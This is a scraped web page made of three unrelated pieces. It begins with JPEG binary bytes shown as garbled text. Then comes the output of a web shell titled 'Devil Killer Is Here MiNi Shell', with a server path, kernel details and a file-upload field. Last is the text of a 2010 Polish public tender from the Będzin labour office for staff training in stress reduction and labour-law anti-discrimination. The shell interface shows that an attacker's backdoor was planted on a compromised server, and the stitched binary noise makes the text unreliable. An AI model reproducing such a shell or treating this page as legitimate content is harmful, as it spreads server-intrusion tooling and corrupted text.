JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100817/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100817/254040-N-2010.html

<p class="kh_header"><b>Będzin: Świadczenie usługi organizacji i obsługi wyjazdowych szkoleń dla pracowników Powiatowego Urzędu Pracy 
w Będzinie na temat: Techniki redukcji stresu (moduł miękki) oraz Kodeks pracy 
ze szczególnym uwzględnieniem zagadnień dotyczących dyskryminacji i nierówności płci na rynku pracy (moduł merytoryczny)</b><br>
<b>Numer ogłoszenia: 254040 - 2010; data zamieszczenia: 17.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Będzinie , ul. 1 Maja 2, 42-500 Będzin, woj. śląskie, tel. 032 2673003, faks 032 2674444.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi organizacji i obsługi wyjazdowych szkoleń dla pracowników Powiatowego Urzędu Pracy 
w Będzinie na temat: Techniki redukcji stresu (moduł miękki) oraz Kodeks pracy 
ze szczególnym uwzględnieniem zagadnień dotyczących dyskryminacji i nierówności płci na rynku pracy (moduł merytoryczny).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres usługi:
1) Przeprowadzenie i obsługa wyjazdowego szkolenia w formie kursu stacjonarnego w zakresie określonym w Rozdziale II ust. 1 SIWZ dla pracowników Powiatowego Urzędu Pracy w Będzinie na temat:
a) Techniki redukcji stresu (moduł miękki) - 15 godzin, szkolenie o charakterze warsztatowym, prowadzone aktywnymi metodami angażującymi wszystkich uczestników zarówno podczas wykładów, ćwiczeń grupowych i indywidualnych, testów, dyskusji, scenek rodzajowych - dwie edycje,
b) Kodeks pracy ze szczególnym uwzględnieniem zagadnień dotyczących dyskryminacji i nierówności płci na rynku pracy (moduł merytoryczny) - 15 godzin, szkolenie o charakterze edukacyjno - doradczym (dyskusja) - dwie edycje.
2) Szkoleniem będzie objętych 29 pracowników, uczestników projektu pn. Inwestycja w kadrę 2010 - 2011 współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Działania 6.1 Poprawa dostępu do zatrudnienia 
oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie Programu Operacyjnego Kapitał Ludzki, 
z zastrzeżeniem Rozdziału II ust. 3 pkt 3 SIWZ.
3) Każde ze szkoleń, o których mowa w Rozdziale II ust. 1 SIWZ realizowane będzie w dwóch edycjach, przy czym:
a) szkolenie w zakresie organizacji modułu miękkiego na temat określony w Rozdziale II ust. 1 pkt 1 SIWZ obejmować będzie 15 uczestników (w ramach pierwszej edycji) oraz 14 uczestników (w ramach drugiej edycji),
b) szkolenie w zakresie organizacji modułu merytorycznego na temat określony Rozdziale II ust. 1 pkt 2 SIWZ obejmować będzie 15 uczestników (w ramach pierwszej edycji) oraz 14 uczestników (w ramach drugiej edycji), przy czym Zamawiający zastrzega sobie prawo zmiany liczby uczestników planowanych 
do objęcia szkoleniem o nie więcej niż 5 osób oraz zmiany liczby uczestników 
w ramach poszczególnych edycji w wyniku nieprzewidzianych zdarzeń losowych 
(np. choroba uczestnika szkolenia, sprawowanie opieki nad chorym członkiem rodziny, rozwiązanie stosunku pracy, itp.).
2. Szkolenie o którym mowa w Rozdziale II ust. 1 pkt 1 i 2 SIWZ obejmować będzie łącznie 30 godzin zajęć szkoleniowych, z których 15 godzin dotyczyć będzie modułu, o którym mowa w Rozdziale II ust. 1 pkt 1 SIWZ i 15 godzin modułu, o którym mowa w Rozdziale II ust. 1 pkt 2 SIWZ, przy czym:
1) szkolenie, o którym mowa w Rozdziale II ust. 1 pkt 1 SIWZ musi obejmować 
10 godzin zajęć praktycznych oraz 5 godzin zajęć teoretycznych, 
2) szkolenie, o którym mowa w Rozdziale II ust. 1 pkt 2 SIWZ musi obejmować 
5 godzin zajęć praktycznych oraz 10 godzin zajęć teoretycznych.
Godzina zegarowa zajęć praktycznych szkolenia liczy 60 minut, a godzina zegarowa zajęć teoretycznych szkolenia liczy 45 minut zajęć i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie.
3. Każdy z modułów, o których mowa w Rozdziale II ust. 1 SIWZ musi być prowadzony przez innego trenera posiadającego odpowiednią wiedzę i doświadczenie w danym zakresie.
4. Zajęcia szkoleniowe muszą odbywać się przez trzy dni robocze od poniedziałku 
do środy lub od środy do piątku w przedziale czasowym od 8 00 do 19 00 
z zastrzeżeniem, że liczba godzin zajęć szkoleniowych w ciągu jednego dnia 
nie przekroczy 6 godzin zegarowych.
5. Szkolenie zostanie przeprowadzone w oparciu o dwa odrębne programy szkolenia, to jest odrębny program szkolenia na temat Techniki redukcji stresu (moduł miękki) oraz odrębny program szkolenia na temat Kodeks pracy ze szczególnym uwzględnieniem zagadnień dotyczących dyskryminacji i nierówności płci na rynku pracy (moduł merytoryczny), które muszą spełniać wymagania określone 
w rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
6. Każda edycja szkolenia zostanie przeprowadzona w oparciu o jednakowe programy szkolenia, które:
1) w przypadku modułu, o którym mowa w Rozdziale II ust. 1 pkt 1 SIWZ muszą obejmować zagadnienia z zakresu:
a) istota stresu, czym jest stres: 
­- stres adaptacyjny i interpretacyjny, 
­- psychologiczne koncepcje stresu,
b) stres jako czynnik zaburzający równowagę psychofizyczną: 
­- eustres i distres, poziom stresu, a skuteczność funkcjonowania, 
­- twórcze wykorzystanie optymalnego poziomu stresu,
c) zrozumienie przyczyn stresu,
d) symptomy ostrzegawcze stresu,
e) strategie radzenia sobie ze stresem,
f) dostosowanie strategii eliminacji do typu stresora i osobowości,
g) techniki redukcji i kontroli stresu i ich praktyczne zastosowanie: 
­- psychofizyczne metody oddziaływania na przyczyny i skutki stresu,
­- techniki integracji emocji,
­- praca z gniewem - najsilniejszą emocją,
­- budowanie  poczucia  wewnętrznej  wolności  jako najsilniejszego czynnika przeciwdziałania stresowi oraz budowanie poczucia wartości,
- techniki akceleracji oddechu - natychmiastowa redukcja stresu,
­- oddech połączony - technika codziennej integracji i regeneracji psychofizycznej,
­- sposoby radzenia sobie ze stresem w zależności od profilu osobowości,
­- sport jako metoda na redukcje skutków stresu, 
­- dieta, suplementy, środki obniżające poziom stresu,
h) metody asertywnego porozumiewania się - jak odmawiać, prosić, itp.,
i) elementy zarządzania swoim czasem i zadaniami,
j) mój plan na stres - opracowanie indywidualnego planu działania,
k) stres w pracy - jego źródło i ujemne skutki na przykładzie pracownika Publicznych Służb Zatrudnienia:  
­- praca źródłem stresu,
­- syndrom wypalenia zawodowego - konsekwencje dla funkcjonowania społecznego jednostki,
­- jak przeciwdziałać stresowi w sytuacji konfliktu.
2) w przypadku modułu, o którym mowa w Rozdziale II ust. 1 pkt 2 SIWZ muszą obejmować zagadnienia 
z zakresu:
a) definicja i zakres równości i dyskryminacji w stosunkach pracy w prawie Unii Europejskiej,
b) równość w dziedzinie zatrudnienia w Konstytucji RP i Kodeksie pracy,
c) zakaz dyskryminacji w stosunku pracy,
d) równość i zakaz dyskryminacji pracowników w orzecznictwie Trybunału Konstytucyjnego i Orzecznictwie Sądu Najwyższego,
e) odpowiedzialność pracodawcy za naruszenie równości pracowników,
f) wynagrodzenie za pracę, awansowanie  pracowników, wpływ pracodawcy 
na kształtowanie kariery zawodowej pracowników, a obowiązek przestrzegania zasady równości w stosunkach pracy,
g) nierówne traktowanie nie będące dyskryminacją, sposoby reakcji na zachowanie dyskryminacyjne.
3) Zakres zagadnień, o których mowa w Rozdziale II ust. 8 pkt 1 i 2 SIWZ może zostać poszerzony i uszczegółowiony przez Wykonawcę, mając na uwadze cel szkolenia oraz jego przydatność w pracy.
7. Edycje szkolenia, o których mowa w Rozdziale II ust. 1 pkt 1 SIWZ zostaną przeprowadzone we Wrocławiu (Dzielnicy Śródmieście) - identyfikator i nazwa jednostki podziału terytorialnego kraju - zgodnie z załącznikiem nr 1 
do rozporządzenia Rady Ministrów z dnia 15 grudnia 1998 roku w sprawie szczegółowych zasad prowadzenia, stosowania i udostępniania krajowego rejestru urzędowego podziału terytorialnego kraju oraz związanych z tym obowiązków organów administracji rządowej i jednostek samorządu terytorialnego (Dz. U. Nr 157, poz. 1031 ze zm.): Wrocław Śródmieście: 026406 9.
8. Edycje szkolenia, o których mowa w Rozdziale II ust. 1 pkt 2 SIWZ zostaną przeprowadzone w Krakowie (Dzielnicy Śródmieście) - identyfikator i nazwa jednostki podziału terytorialnego kraju - zgodnie z załącznikiem nr 1 do rozporządzenia Rady Ministrów z dnia 15 grudnia 1998 roku w sprawie szczegółowych zasad prowadzenia, stosowania i udostępniania krajowego rejestru urzędowego podziału terytorialnego kraju oraz związanych z tym obowiązków organów administracji rządowej i jednostek samorządu terytorialnego (Dz. U. Nr 157, poz. 1031 ze zm.): Kraków Śródmieście: 126105 9.
9. Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom każdej edycji szkolenia:
1) transport z siedziby Zamawiającego do miejsca szkolenia i z powrotem środkiem transportu przystosowanym do przewozu co najmniej 20 osób wraz z bagażami wyposażonym w ogrzewanie i klimatyzację. Szczegóły dotyczące zasad transportu 
w tym godzin wyjazdu, zostaną ustalone przez Zamawiającego z Wykonawcą 
w formie pisemnej po zawarciu umowy ws. udzielenia niniejszego zamówienia publicznego,
2) zakwaterowanie wraz z noclegiem podczas trwania szkolenia w hotelu co najmniej trzygwiazdkowym w pokojach jedno lub dwuosobowych z łazienką, obejmujące dwie doby hotelowe, z zastrzeżeniem, że zajęcia szkoleniowe odbywać się będą w tym samym budynku, w którym zakwaterowani będą uczestnicy szkolenia,
3) wyżywienie obejmujące:
a) obiad i kolację w pierwszym dniu szkolenia,
b) śniadanie, obiad i kolację w drugim dniu szkolenia,
c) śniadanie i obiad w trzecim dniu szkolenia -
podawane w innej sali niż sala wykładowa, na które składać się będą: dania ciepłe (mięsne, rybne, warzywne), sałatki, zakąski zimne, desery (wyroby cukiernicze, owoce), soki, woda mineralna gazowana i niegazowana, a także stoliki koktajlowe 
i serwis gastronomiczny (przygotowanie, obsługa kelnerska, nakrycie stołów - obrusy, zastawa oraz przygotowanie i sprzątanie),
4) zimne napoje, to jest soki i wodę mineralną w każdym dniu szkolenia,
5) serwis kawowy w trakcie przerw kawowych obejmujący świeżoparzoną, gorącą kawę i herbatę, 3 rodzaje ciastek, serwis gastronomiczny (zastawa, przygotowanie 
i sprzątanie) w każdym dniu szkolenia,
6) konieczne materiały szkoleniowe w formie papierowej i elektronicznej (na nośniku informacji typu pen drive) - zgodne z tematyką szkolenia, w skład których wchodzą w szczególności: skrypty lub inne niezbędne pomoce naukowe, akty prawne, wzory dokumentów i formularzy z zakresu objętego tematem szkolenia, a także materiały biurowe, w tym: notatnik (minimum format A5 60-kartkowy) i przybory do pisania, przekazywane każdemu uczestnikowi na własność. Materiały szkoleniowe powinny być przekazywane uczestnikom szkolenia wraz z rozpoczęciem szkolenia, bądź 
na bieżąco zgodnie z realizowanym tematem zajęć oraz oznakowane zgodnie 
z Rozdziałem II ust. 14 SIWZ. Materiały szkoleniowe i materiały biurowe, 
które uczestnik otrzyma na własność muszą być nowe, nieużywanie, adekwatne 
do treści szkolenia, z obowiązującym stanem prawnym oraz dobre jakościowo,
7) dostęp do pomieszczeń sanitarnych w budynku, w którym odbywać się będą zajęcia szkoleniowe (wc, umywalka) w każdym dniu szkolenia,
8) ubezpieczenie od następstw nieszczęśliwych wypadków wszystkich uczestników szkolenia od pierwszego do ostatniego dnia szkolenia,
9) niezbędny sprzęt, maszyny, narzędzia i urządzenia na czas trwania szkolenia, 
w tym projektor multimedialny, ekran oraz tablicę demonstracyjną flipchart 
z zapasem kartek,
10) dokładny rozkład zajęć odpowiadający harmonogramowi szkolenia z podanymi tematami wynikającymi z programu szkolenia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia szkolenia.
10. Zajęcia szkoleniowe zostaną przeprowadzone w miejscu zakwaterowania 
w pomieszczeniu z odpowiednim oświetleniem oraz dostępem do światła dziennego 
(z możliwością zaciemnienia okien), ogrzewaniem i klimatyzacją, dostosowanym 
do prowadzenia zajęć szkoleniowych, zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne 
i jakościowe, którego powierzchnia, ilość stanowisk oraz wyposażenie w sprzęt 
i pomoce dydaktyczne dostosowana jest do zakresu szkolenia oraz liczby uczestników szkolenia, zgodnie z przepisami:
1) rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 31 grudnia 2002 roku 
w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach 
i placówkach (Dz. U. z 2003 r. Nr 6, poz. 69),
2) rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 roku 
w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity: 
Dz. U. z 2003 r. Nr 169, poz. 1650 ze zm.),
3) rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie 
(Dz. U. Nr 75, poz. 690 ze zm.),
4) rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 roku w sprawie ochrony przeciwpożarowej budynków i innych obiektów budowlanych i terenów (Dz. U. Nr 80, poz. 563).
11. Wykonawca zobowiązany jest wystawić każdemu uczestnikowi szkolenia 
po pozytywnym jego zakończeniu certyfikat o ukończeniu szkolenia zawierający 
co najmniej:
1) imię i nazwisko uczestnika szkolenia,
2) pełną nazwę szkolenia,
3) nazwę organizatora szkolenia,
4) czas trwania szkolenia,
5) cel szkolenia,
6) wykaz przedmiotów objętych szkoleniem ze wskazaniem nazwy przedmiotu, wymiaru godzin zajęć teoretycznych i praktycznych poszczególnych przedmiotów oraz łącznego wymiaru godzin zajęć teoretycznych i praktycznych w ramach szkolenia,
7) pieczęć i podpis organizatora szkolenia,
8) datę wystawienia certyfikatu i numer certyfikatu.
Certyfikat zostanie wydrukowany przez Wykonawcę (biały papier, format A4, +)- 200g na m2, połyskujący, druk kolorowy) oraz oznakowany zgodnie z Rozdziałem II ust. 14 SIWZ.
12. Wykonawca zobowiązany jest oznakować miejsce prowadzenia szkolenia poprzez zamieszczenie informacji o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Informacja ta winna zostać opatrzona logiem Unii Europejskiej, Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki. Wykonawca zobowiązany jest analogicznie oznakować materiały edukacyjne oraz dokumenty potwierdzające ukończenie szkolenia. Zamawiający udostępni w wersji elektronicznej wymagane logotypy.
13. Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu szkolenia stanowiącej: dziennik zajęć edukacyjnych zawierający listę obecności uwzględniającą podpisy uczestników szkolenia oraz wymiar godzin 
i tematy zajęć edukacyjnych, rejestr wydanych dokumentów potwierdzających ukończenie szkolenia, potwierdzenie wydania uczestnikom szkolenia materiałów dydaktycznych oraz ankiety wypełnione przez uczestników szkolenia służące do jego oceny, oznakowane zgodnie z Rozdziałem II ust. 14 SIWZ.
14. Wykonawca będzie bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie i obsługę szkolenia oraz zapewnienie osoby będącej koordynatorem szkolenia. Osoba ta przez okres trwania szkolenia musi przebywać w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i powinna dysponować telefonem stacjonarnym lub komórkowym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania uprawnień 
do wykonywania określonej działalności lub czynności, jeżeli ten oświadczy, że posiada uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania wiedzy 
i doświadczenia, jeżeli ten wykaże, że w okresie ostatnich trzech lat )* przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedno szkolenie dotyczące  zagadnień w zakresie technik redukcji stresu oraz co najmniej jedno szkolenie dotyczące zagadnień z zakresu Kodeksu pracy, z podaniem wartości poszczególnych szkoleń, ich przedmiotu, dat wykonania i odbiorców oraz załączy dokument potwierdzający, 
że każde z tych szkoleń zostało wykonane lub w przypadku świadczeń okresowych lub ciągłych jest wykonywane należycie )**.

)*  okres ostatnich trzech lat nie dotyczy lat kalendarzowych, przy obliczaniu tego terminu należy stosować art. 112 ustawy z dnia 23 kwietnia 1964 roku Kodeks cywilny, zgodnie z którym termin oznaczony w latach kończy się z upływem dnia, który nazwą lub datą odpowiada początkowemu dniowi terminu.

)**  należy wypełnić wszystkie pozycje formularza - Wykaz wykonanych, 
a w przypadku świadczeń okresowych lub ciągłych - wykonywanych szkoleń dotyczących  zagadnień w zakresie technik redukcji stresu oraz zagadnień z zakresu Kodeksu pracy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie stanowiącego załącznik nr 5 do SIWZ, podając w każdej wypełnionej pozycji formularza:
1) nazwę - przedmiot szkolenia (odpowiadający opisowi przedmiotu zamówienia 
w Rozdziale II ust. 1 SIWZ w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, to jest w zakresie organizacji szkoleń dotyczących zagadnień dotyczących technik redukcji stresu oraz zagadnień z zakresu Kodeksu pracy) - należy podać wyłącznie szkolenia w w.wym. zakresie, oznaczające pozaszkolne zajęcia mające na celu uzyskanie, uzupełnienie lub doskonalenie umiejętności i kwalifikacji zawodowych,
2) liczbę uczestników szkolenia,
3) wartość szkolenia w PLN,
4) datę wykonania szkolenia, a  w przypadku świadczeń okresowych lub ciągłych - daty wykonywania poszczególnych szkoleń  (od ... do ...),
5) odbiorcę usługi (nazwę zlecającego szkolenie, adres oraz telefon kontaktowy),
6) nazwę dokumentu potwierdzającego, że szkolenie to zostało wykonane należycie lub w przypadku świadczeń okresowych lub ciągłych jest wykonywane należycie - (należy nazwać ten dokument, np. referencja, rekomendacja, przy czym dokument powinien być wystawiony przez osobę trzecią - podmiot zlecający szkolenie 
i dotyczyć wyłącznie zakresu odpowiadającego przedmiotowi zamówienia opisanego w Rozdziale II ust. 1 SIWZ), dokument należy załączyć do oferty oraz podać numer strony, którym dokument jest oznaczony w ofercie). Niewypełnienie pozycji formularza dotyczącej nazwy dokumentu potwierdzającego, że szkolenie zostało wykonane należycie lub - w przypadku świadczeń okresowych lub ciągłych - jest wykonywane należycie lub brak wskazania numeru strony, którym dokument jest oznaczony w ofercie skutkować będzie nieuwzględnieniem przez Zamawiającego danej pozycji formularza przy dokonywaniu oceny spełniania przez Wykonawcę warunku posiadania wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym jeśli Wykonawca na czas realizacji zamówienia będzie dysponował odpowiednim potencjałem technicznym koniecznym do wykonania zamówienia, to jest salą wykładową wyposażoną co najmniej w:
1) zestaw komputerowy wraz z monitorem bądź laptop,
2) projektor multimedialny,
3) tablicę demonstracyjną flipchart z zapasem kartek,
co wykaże w formularzu - Wykaz narzędzi, wyposażenia i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami stanowiącym załącznik nr 6 do SIWZ, wypełniając wszystkie jego pozycje, w tym również dotyczące informacji o podstawie 
do dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia jeśli Wykonawca na czas realizacji zamówienia będzie dysponował będzie dysponował co najmniej 2 trenerami zdolnymi 
do wykonania zamówienia w celu zapewnienia właściwej realizacji programu szkolenia określonego w opisie przedmiotu zamówienia, w tym 1 trenerem, który poprowadzi zajęcia w zakresie określonym w Rozdziale II ust. 8 pkt 1 SIWZ (moduł miękki) 
oraz 1 trenerem, który poprowadzi zajęcia w zakresie określonym w Rozdziale II ust. 8 pkt 2 SIWZ (moduł merytoryczny), przy czym każdy z tych trenerów:
1) posiada wykształcenie wyższe w rozumieniu przepisów ustawy z dnia 27 lipca 2005 roku - Prawo o szkolnictwie wyższym (Dz. U. Nr 164, poz. 1365 ze zm.) - przedmiotową informację należy zamieścić w pozycji Wykazu osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącego załącznik nr 7 do SIWZ dotyczącej kwalifikacji zawodowych i wykształcenia niezbędnego do wykonania zamówienia,
